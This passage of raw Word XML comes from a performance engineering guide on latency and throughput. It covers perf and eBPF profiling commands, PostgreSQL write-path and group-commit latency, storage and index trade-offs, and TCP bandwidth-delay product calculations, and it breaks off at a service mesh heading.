    <w:p w14:paraId="23A28CC4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       (must configure buckets to match expected latency range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFEFF64" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For multi-instance services where you need aggregate percentiles, Prometheus histograms are required. Summaries give per-instance percentiles that cannot be meaningfully combined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A985E0B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using Perf and eBPF for Deep Latency Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CA71C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>perf for CPU and memory profiling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2783B238" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258C80B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Record CPU cycles for 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FEFC3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>perf record -g -F 99 -p &lt;pid&gt; sleep 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F19B0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="63292C88" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Generate flame graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E5511" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>perf script | stackcollapse-perf.pl | flamegraph.pl &gt; cpu_profile.svg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E324A15" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6A5110D2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Profile memory access patterns (cache misses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF389B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>perf stat -e cache-misses,cache-references,L1-dcache-load-misses,LLC-load-misses -p &lt;pid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B76DD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The flame graph shows where CPU time is spent — wide bars indicate functions consuming most CPU. For latency analysis: functions on the critical path consuming disproportionate CPU are targets for optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227BCCFC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eBPF for latency tracing without instrumentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273AB14" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76D557" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Trace all syscall latencies &gt; 10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3317E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @start[tid] = nsecs; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE72CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">             tracepoint:raw_syscalls:sys_exit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B74657" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">             /@start[tid] &amp;&amp; (nsecs - @start[tid]) &gt; 10000000/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D125AF5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">             { printf("syscall latency: %d ms\n", (nsecs - @start[tid])/1000000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443863A9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">               delete(@start[tid]); }'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42543192" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="32FE8C73" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t># Trace disk I/O latency distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5EEC85" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>biolatency -m 10  # histogram of block I/O latency in milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A494DD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>eBPF programs run in the kernel with zero application code changes — no instrumentation required. They can observe system call latency, disk I/O latency, network packet processing latency, and function call latency with nanosecond precision and negligible overhead (typically &lt;1% CPU overhead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFC75E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="1BE7D8BC">
          <v:rect id="_x0000_i5202" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C015E6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Latency and Throughput in Specific System Contexts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B14ED9A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Throughput and Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBFDA5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The write path latency breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E6E77" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90CF07" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>INSERT into PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D632CDE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1. Parse SQL:                  ~0.1ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCF4A6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  2. Plan query:                 ~0.1ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C026064" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  3. Write to WAL buffer:        ~0.01ms (memory write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238BF3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  4. Write WAL to disk (fsync):  ~0.5ms (NVMe SSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D31A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  5. Write to table heap:        ~0.01ms (memory, async to disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33366068" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  6. Update indexes:             ~0.1ms per index (memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D4AF9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  7. COMMIT acknowledgment:      returned after step 4 (WAL flushed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D22074" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6633CE7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Total write latency: ~1ms (NVMe) to ~10ms (HDD) dominated by WAL fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C859522" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The WAL group commit optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB71FA1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Multiple concurrent transactions can share a single fsync:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B453B15" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F85511" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Transaction A starts: writes WAL record to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E44F1B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Transaction B starts: writes WAL record to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBA829" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Transaction C starts: writes WAL record to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2EEF35" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>All three complete their WAL writes simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9B9493" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="779FC0D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Group commit: one fsync flushes all three WAL records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4DDAE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → 3 transactions committed with 1 fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A92844" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Each transaction's commit latency = fsync_latency / concurrent_commit_group_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A7A31" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Group commit is why database write throughput increases with concurrent writers — more concurrent writers → larger commit groups → each fsync amortized across more transactions → higher transactions/second without increasing fsync rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE7A34" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The read throughput vs read latency optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492CC8D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For analytics queries (full table scans, aggregations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBDDE6B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Column-oriented storage (Parquet, ORC):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Read only the columns needed → less data from disk → higher effective throughput. Sequential I/O (entire column is contiguous) → maximum disk/SSD bandwidth utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A7442" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compressed storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> More data per I/O operation → higher effective throughput at the cost of decompression CPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1AC319" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For OLTP queries (point lookups, range queries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB55A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B-tree indexes:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> O(log N) lookup → low latency for point queries. But tree traversal = random I/O → poor throughput for full scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD08FCC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash indexes:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> O(1) point lookup → lowest single-key lookup latency. Unusable for range queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29798D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buffer pool:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Keeps hot pages in RAM → eliminates disk I/O latency → dramatically increases throughput by serving reads from memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128D430" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Throughput and Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26611798" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP throughput formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2FA1B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D1E07C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput = Window_Size / RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439DC67E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="16D4BAA0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Window_Size = min(CWND, RWND)  (congestion window, receive window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A084059" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="29998753" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For 1Gbps link with 100ms RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E951B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  BDP = 1Gbps × 0.1s = 100Mb = 12.5MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEFEBA2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Required window size to fully utilize: 12.5MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F9B1F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Default TCP receive buffer: ~256KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5EA2A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F925820" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput = 256KB / 0.1s = 2.56MB/s = 20.5Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BA8B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → 98% of 1Gbps link bandwidth is wasted by insufficient window size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93DC81" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7F15E8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Large TCP windows → higher throughput → but more data in flight → more data lost on packet loss → more data to retransmit → higher latency on retransmit events. The optimal window size for latency-sensitive applications may be smaller than optimal for throughput-maximizing applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72784556" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Bandwidth-Delay Product (BDP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B08EF34" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD5436" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>BDP = Bandwidth × RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10248FE9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="65B18D86" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Full bandwidth utilization requires in-flight data ≥ BDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F2A24" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Any reduction in in-flight data below BDP = bandwidth underutilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A508675" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7E433F78" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Tuning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6E04B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  High BDP path (intercontinental fiber): maximize window size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58378745" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Low BDP path (local LAN): window size less critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D3CCD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  BBR congestion control: explicitly estimates BDP and sets window accordingly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F228366" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Mesh and gRPC Throughput/Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17D4B8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The overhead of service mesh sidecar proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F486991" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
